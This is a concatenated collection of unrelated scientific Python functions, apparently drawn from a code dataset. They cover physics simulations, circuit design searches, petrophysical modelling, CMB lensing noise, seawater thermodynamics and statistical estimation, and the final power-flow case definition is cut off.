sumagrid_subs = np.zeros([2])\r\n sumagrid_subs[0] = np.sum(self.grid[:,:,0]) #JV: Number of type-0 particles\r\n sumagrid_subs[1] = sumagrid - sumagrid_subs[0] #JV: Number of type-1 particles\r\n\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n for l in range(2):\r\n if ((self.grid[j,k,0]+self.grid[j,k,1]) != 0):\r\n # pji = float(self.grid[j,k,l])/(update_entropy*(self.grid[j,k,0]+self.grid[j,k,1]))\r\n pji = float((self.grid[j,k,l]/(sumagrid_subs[l]/(sumagrid_subs[0]+sumagrid_subs[1])))/(update_entropy*(self.grid[j,k,0]/(sumagrid_subs[0]/(sumagrid_subs[0]+sumagrid_subs[1])))+(self.grid[j,k,1]/(sumagrid_subs[1]/(sumagrid_subs[0]+sumagrid_subs[1])))))\r\n else:\r\n pji = 0\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji) #JV: We will only calculate the value when pji != 0\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n else:\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n pji = float(self.grid[j,k,0])/(update_entropy*sumagrid)\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji)\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2])\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n else:\r\n print(\"Computing with the Verlet algorithm\")\r\n\r\n #Generation of 
the precious position (backwards euler step)\r\n X1 = self.X\r\n Y1 = self.Y\r\n X0 = X1 - self.VX*dt\r\n Y0 = Y1 - self.VY*dt\r\n\r\n for self.i in range(0,self.n):\r\n #Call verlet to compute the next position\r\n X2,Y2 = self.verlet(t,dt,np.array([X0,Y0]),np.array([X1,Y1]))\r\n t = t + dt\r\n\r\n #Add the new positions to X,Y,VX,VY\r\n self.X = np.vstack((self.X,X2))\r\n self.Y = np.vstack((self.Y,Y2))\r\n self.VX = np.vstack((self.VX,(X2-X0)/(2*dt)))\r\n self.VY = np.vstack((self.VY,(Y2-Y0)/(2*dt)))\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n X1,Y1 = X2,Y2\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(self.i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n #Once the computation has ended, I compute the kinetic energy,\r\n #the magnitude of the velocity V and the temperature\r\n #(see doc for temperature definition)\r\n self.KE()\r\n self.V = np.sqrt((self.VX**2 + self.VY**2))\r\n self.T = (np.sum(self.V**2,axis=1)/(self.particles.size*2 - 2))\r\n\r\n #Generation of the MB functions, you can modify the definition by\r\n #changing the linspace points\r\n vs,a = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n a,ts = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n self.MB = (vs/(ts)*np.exp(-vs**2/(2*ts)))\r\n\r\n #JV: If we are on the Subsystems submenu, we will calculate the temperature and the MB distribution of both types of particles\r\n if(self.param[4] == \"Subsystems\"):\r\n\r\n #JV: 1st group of particles\r\n self.V1 = np.sqrt((self.VX[:,0:(self.param[5]**2)]**2 + self.VY[:,0:(self.param[5]**2)]**2))\r\n self.T1 = (np.sum(self.V1**2,axis=1)/((self.param[5]**2)*2 - 2))\r\n\r\n vs1,a1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n a1,ts1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n self.MB1 = (vs1/(ts1)*np.exp(-vs1**2/(2*ts1)))\r\n\r\n #JV: 2nd group\r\n self.V2 = np.sqrt((self.VX[:,(self.param[5]**2):self.particles.size]**2 + self.VY[:,(self.param[5]**2):self.particles.size]**2))\r\n self.T2 = (np.sum(self.V2**2,axis=1)/((self.particles.size-self.param[5]**2)*2 - 2))\r\n\r\n vs2,a2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n a2,ts2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n self.MB2 = (vs2/(ts2)*np.exp(-vs2**2/(2*ts2)))\r\n\r\n \"\"\"Here I generate the accumulated V,T and MB using lists, the reason I use lists is because if you append two numpy arrays\r\n to an empty numpy array, they merge instead of remaining separate. 
You could technically use splicing to save on memory\r\n but sacrificing cpu.\"\"\"\r\n\r\n self.Vacu = []\r\n self.Tacu = []\r\n self.MBacu = []\r\n self.Vacu.append(self.V[int(self.n/2),:])\r\n self.Tacu.append(np.sum(self.V[int(self.n/2),:]**2)/(self.particles.size*2 - 2))\r\n\r\n vs = np.linspace(0,self.V.max(),100)\r\n self.MBacu.append((vs/(self.Tacu[0])*np.exp(-vs**2/(2*self.Tacu[0]))))\r\n\r\n #This delta controls the time interval for accumulation, right now its every 5 units\r\n delta = 5./dt\r\n\r\n #This 40 that appers in these lines is the time from which I start accumulating\r\n #to ensure the system has reached equilibrium.\r\n for i in range(1,int((self.n-(40./dt))/delta)):\r\n self.Vacu.append(np.hstack((self.Vacu[i-1],self.V[int(40./dt)+int(i*delta),:])))\r\n self.Tacu.append(np.sum(self.Vacu[i]**2)/(self.Vacu[i].size*2 - 2))\r\n self.MBacu.append((vs/(self.Tacu[i])*np.exp(-vs**2/(2*self.Tacu[i]))))\r\n return", "def fig16():\n # fmt: off\n tpm = np.array([\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 0, 0],\n [1, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [1, 0, 0, 0, 0, 1, 1],\n [1, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 
0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n ])\n cm = np.array([\n [0, 1, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 0, 0, 0, 1, 1],\n ])\n # fmt: on\n return Network(tpm, cm=cm, node_labels=LABELS[:tpm.shape[1]])", "def calibration(N,kb,T,Ekinv,V):\n lamb = np.sqrt((N-1)*3*kb*T/(Ekinv*2))\n \n if lamb < 0.9999:\n V = lamb*V\n elif lamb>1.0001:\n V = lamb*V\n \n return V", "def ec_matrix_vector(p0, T, n): \n if(n<=0):\n EC=np.zeros(T.shape)\n return EC\n else:\n \"\"\"Probability vector after (k=0) propagations\"\"\" \n p_k=1.0*p0\n \"\"\"Sum of vectors after (k=0) propagations\"\"\"\n p_sum=1.0*p_k \n for k in xrange(n-1):\n \"\"\"Propagate one step p_{k} -> p_{k+1}\"\"\"\n p_k=np.dot(p_k,T) \n \"\"\"Update sum\"\"\"\n p_sum+=p_k \n \"\"\"Expected counts\"\"\"\n EC=p_sum[:,np.newaxis]*T \n return EC", "def test_simple():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n EI, top, bot = bm.EI(sections, E)\n EIc = E * B * (H ** 3) / 12\n assert 0.99 < EI / EIc < 1.01\n assert top == H / 2\n assert bot == -H / 2", "def design_TIA_inverter(db_n, db_p, sim_env,\n vg_res, rf_res,\n vdd_nom, vdd_vec, cpd, cload, \n rdc_min, fbw_min, pm_min, BER_max,\n vos, isw_pkpk,\n vb_n, vb_p, error_tol=0.05, ibias_max=20e-6):\n # Finds all possible designs for one value of VDD, then\n # confirm which work with all other VDD values.\n possibilities = []\n\n vg_vec = np.arange(0, vdd_nom, vg_res)\n \n for vg in vg_vec:\n print(\"VIN:\\t{0}\".format(vg))\n n_op_info = db_n.query(vgs=vg, vds=vg, vbs=vb_n-0)\n p_op_info = db_p.query(vgs=vg-vdd_nom, vds=vg-vdd_nom, vbs=vb_p-vdd_nom)\n \n if np.isinf(ibias_max):\n nf_n_max = 200\n else:\n nf_n_max = int(round(ibias_max/n_op_info['ibias']))\n \n nf_n_vec = np.arange(1, nf_n_max, 1)\n for nf_n in nf_n_vec:\n # Number of fingers can only be integer,\n # so increase as necessary until you get\n # sufficiently accurate/precise bias + current match\n ratio_good, nf_p = verify_ratio(n_op_info['ibias'],\n p_op_info['ibias'],\n nf_n,\n error_tol)\n if not ratio_good:\n continue\n\n # Getting small signal parameters to constrain Rf\n inv = LTICircuit()\n inv.add_transistor(n_op_info, 'out', 'in', 'gnd', fg=nf_n)\n inv.add_transistor(p_op_info, 'out', 'in', 'gnd', fg=nf_p)\n inv_num, inv_den = inv.get_num_den(in_name='in', out_name='out', in_type='v')\n A0 = abs(inv_num[-1]/inv_den[-1])\n \n gds_n = n_op_info['gds'] * nf_n\n gds_p = p_op_info['gds'] * nf_p\n gds = abs(gds_n) + abs(gds_p)\n ro = 1/gds\n \n # Assume Rdc is negative, bound Rf\n rf_min = max(rdc_min*(1+A0)/A0 + ro/A0, 0)\n rf_vec = np.arange(rf_min, rdc_min*2, rf_res)\n for rf in rf_vec:\n # With all parameters, check if it meets small signal spec\n meets_SS, SS_vals = verify_TIA_inverter_SS(n_op_info, p_op_info,\n nf_n, nf_p, rf, cpd, cload,\n rdc_min, fbw_min, pm_min)\n # With all parameters, estimate if it will 
meet noise spec\n meets_noise, BER = verify_TIA_inverter_BER(n_op_info, p_op_info, \n nf_n, nf_p,\n rf, cpd, cload,\n BER_max, vos, isw_pkpk)\n \n meets_spec = meets_SS # and meets_noise\n # If it meets small signal spec, append it to the list\n # of possibilities\n if meets_spec:\n possibilities.append(dict(vg=vg,\n vdd=vdd_nom,\n nf_n=nf_n,\n nf_p=nf_p,\n rf=rf,\n rdc=SS_vals['rdc'],\n fbw=SS_vals['fbw'],\n pm=SS_vals['pm'],\n ibias=ibias_n,\n BER=BER))\n elif SS_vals['fbw'] != None and SS_vals['fbw'] < fbw_min:\n # Increasing resistor size won't help bandwidth\n break\n \n # Go through all possibilities which work at the nominal voltage\n # and ensure functionality at other bias voltages\n # Remove any nonviable options\n print(\"{0} working at nominal VDD\".format(len(possibilities)))\n for candidate in possibilities:\n nf_n = candidate['nf_n']\n nf_p = candidate['nf_p']\n rf = candidate['rf']\n for vdd in vdd_vec:\n new_op_dict = vary_supply(vdd, db_n, db_p, nf_n, nf_p, vb_n, vb_p)\n vg = new_op_dict['vb']\n n_op = new_op_dict['n_op']\n p_op = new_op_dict['p_op']\n \n # Confirm small signal spec is met\n meets_SS, scratch = verify_TIA_inverter_SS(n_op, p_op,\n nf_n, nf_p, rf, cpd, cload,\n rdc_min, fbw_min, pm_min)\n \n # Confirm noise spec is met\n meets_noise, BER = verify_TIA_inverter_BER(n_op, p_op, \n nf_n, nf_p,\n rf, cpd, cload,\n BER_max, vos, isw_pkpk)\n \n meets_spec = meets_SS # and meets_noise\n \n if not meets_spec:\n possibilities.remove(candidate)\n break\n \n # Of the remaining possibilities, check for lowest power.\n # If there are none, raise a ValueError.\n if len(possibilities) == 0:\n raise ValueError(\"No final viable solutions\")\n \n print(\"{0} working at all VDD\".format(len(possibilities)))\n best_op = possibilities[0]\n for candidate in possibilities:\n best_op = choose_op_comparison(best_op, candidate)\n \n return best_op", "def Char_Gate(NV,res ,B_field=400):\n\n\n #data = np.loadtxt(\"NV_Sim_8.dat\") #Placeholder data to test the script\n #NV = np.vstack((data[:,3],data[:,4]))\n #physical constants\n gamma_c = 1.071e3 #g-factor for C13 in Hz/G\n #Model parameters\n omega_larmor = 2*np.pi*gamma_c*B_field\n tau_larmor = 2*np.pi/omega_larmor\n tau = res[0]\n n_pulses = int(res[1]*2) #So that we do a pi -pulse\n\n Ix = 0.5 * np.array([[0,1],[1,0]])\n Iz = 0.5* np.array([[1,0],[0,-1]])\n H0 = (omega_larmor)*Iz\n exH0 =linalg.expm(-1j*H0*tau)\n\n\n M = np.zeros(np.shape(NV)[0])\n for idC in range(np.shape(NV)[0]):\n A= 2*np.pi*NV[idC,0]\n B= 2*np.pi*NV[idC,1] #Converts to radial frequency in Hz/G\n H1 = (A+omega_larmor) *Iz +B*Ix\n exH1 = linalg.expm(-1j*H1*tau)\n V0 = exH0.dot(exH1.dot(exH1.dot(exH0)))\n V1 = exH1.dot(exH0.dot(exH0.dot(exH1)))\n n0 = Calc_axis(V0)\n n1 =Calc_axis(V1)\n phi = np.real(2*np.arccos(np.trace(V0)/2))\n M[idC] = 1 - (1-np.dot(n0,n1))*np.sin(n_pulses * phi /2 )**2\n\n Signal = -M.prod()\n F = (1-(Signal+1)/2)\n return F", "def estimate_ivec(nt, ft, v_matrix, vtv_matrix, eye=None):\n v_dim = v_matrix.shape[1]\n n_gauss = nt.shape[1]\n\n # Construct eye if necessary\n if eye is None:\n eye = Extractor.to_rfpf(np.eye(v_dim, dtype=v_matrix.dtype).T)\n\n it = eye.T.reshape((1, -1))\n vtvt = vtv_matrix.T.reshape((n_gauss, -1))\n\n b = np.dot(ft, v_matrix).T\n lt = np.dot(nt, vtvt) + it\n\n l = lt.reshape((vtv_matrix.shape[1], vtv_matrix.shape[0])).T\n\n out = Extractor.solve(l, b)\n\n return out", "def Phi_nu_mu1(self, E_nu, N=1e24):\n #check this \n try:\n phi = [0.]*len(E_nu)\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) 
* self.F_nu_mu_1(E_nu/x, x) / x\n\n for i, E_nu in enumerate(E_nu):\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n\n for j in range(Intervals):\n phi[i] += 1.6*N*quad(Int, IntegrationBoundary[j], IntegrationBoundary[j+1])[0]\n\n return np.array(phi)\n\n except TypeError as e:\n phi = 0.\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n for i in range(Intervals):\n phi += 1.6*N*quad(Int, IntegrationBoundary[i], IntegrationBoundary[i+1])[0]\n print (phi)\n\n return phi", "def ORM1(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,DTCO,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dc2,Dk,Dpf],[HIc1,HIc2,HIk,HIpf],[DTc1,DTc2,DTk,DTpf],[1,1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=XMatrix[1] # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[2] # Volume of organic component\n\t\tPHIe=XMatrix[3] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water 
Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def N_TT_TE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_TE(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTE(l2)\n result += self.F_TE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n\n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def enthalpy_SSO_0_p(p):\r\n v01 = 9.998420897506056e+2\r\n v05 = -6.698001071123802\r\n v08 = -3.988822378968490e-2\r\n v12 = -2.233269627352527e-2\r\n v15 = -1.806789763745328e-4\r\n v17 = -3.087032500374211e-7\r\n v20 = 1.550932729220080e-10\r\n v21 = 1.0\r\n v26 = -7.521448093615448e-3\r\n v31 = -3.303308871386421e-5\r\n v36 = 5.419326551148740e-6\r\n v37 = -2.742185394906099e-5\r\n v41 = -1.105097577149576e-7\r\n v43 = -1.119011592875110e-10\r\n v47 = -1.200507748551599e-15\r\n SSO = 35.16504\r\n a0 = v21 + SSO * (v26 + v36 * SSO + v31 * np.sqrt(SSO))\r\n a1 = v37 + v41 * SSO\r\n a2 = v43\r\n a3 = v47\r\n b0 = v01 + SSO * (v05 + v08 * np.sqrt(SSO))\r\n b1 = 0.5 * (v12 + v15 * 
SSO)\r\n b2 = v17 + v20 * SSO\r\n b1sq = b1 ** 2\r\n sqrt_disc = np.sqrt(b1sq - b0 * b2)\r\n N = a0 + (2 * a3 * b0 * b1 / b2 - a2 * b0) / b2\r\n M = a1 + (4 * a3 * b1sq / b2 - a3 * b0 - 2 * a2 * b1) / b2\r\n A = b1 - sqrt_disc\r\n B = b1 + sqrt_disc\r\n part = (N * b2 - M * b1) / (b2 * (B - A))\r\n db2Pascal = 10000.0\r\n return (db2Pascal * (p * (a2 - 2 * a3 * b1 / b2 + 0.5 * a3 * p) / b2 +\r\n (M / (2 * b2)) * np.log(1 + p * (2 * b1 + b2 * p) / b0) + part *\r\n np.log(1 + (b2 * p * (B - A)) / (A * (B + b2 * p)))))", "def expected_counts(p0, T, n): \n M=T.shape[0]\n if n<=M:\n return ec_matrix_vector(p0, T, n)\n else:\n return ec_geometric_series(p0, T, n)", "def test_compute_inventory():\n T = [1000]\n c_max = [1e20]\n time = 1e3\n inv, sig = divHretention.compute_inventory(T, c_max, time)\n assert len(inv) == len(sig)\n assert len(inv) == len(T)", "def e_step(self):\n # update VMF probabilities (Equation (3))\n logP = np.dot(self.features, self.mu.T)*self.kappa + np.log(self.pi).reshape(1,-1) # n by k\n logP_norm = logP - logsumexp(logP, axis=1).reshape(-1,1)\n self.p = np.exp(logP_norm)\n self.mllk = np.mean(logsumexp(logP, axis=1))", "def case():\r\n #ppc = {\"version\": '2'}\r\n ppc = {}\r\n ##----- Power Flow Data -----##\r\n ## system MVA base\r\n ppc[\"baseMVA\"] = 100.0\r\n\r\n ## bus data\r\n # bus_i type Pd Qd 